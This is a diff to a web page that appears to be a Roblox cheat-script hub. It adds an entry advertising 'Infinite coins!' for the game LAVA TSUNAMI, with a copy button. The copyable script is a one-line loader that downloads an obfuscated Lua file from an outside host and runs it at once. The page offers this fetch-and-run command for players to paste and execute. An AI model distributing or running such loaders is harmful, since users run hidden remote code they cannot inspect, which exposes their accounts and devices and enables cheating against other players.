--- a/index.html
+++ b/index.html
@@ -450,14 +450,14 @@
 
 
 <div class="script-item new-style">
-    <div class="script-header">a</div>
-    <div class="subheader">a</div>
-    <div class="script-code">a
+    <div class="script-header">LAVA TSUNAMI 🔥</div>
+    <div class="subheader">Infinite coins!</div>
+    <div class="script-code">loadstring(game:HttpGet("https://getorbs.us.to/LT-obfuscated.lua"))()
     </div>
     <div class="button-container">
         <button class="copy-button new-style" onclick="copyToClipboard(this)">Copy</button>
         <!-- Optional: Add a button to join the game -->
-        <button class="join-game-button new-style" onclick="joinGame('https://www.roblox.com/games/130491334574811/Free-Donation-Spinner')">Game link</button>
+        <button class="join-game-button new-style" onclick="joinGame('https://www.roblox.com/games/16805761403/LAVA-TSUNAMI')">Game link</button>
     </div>
 </div>
 
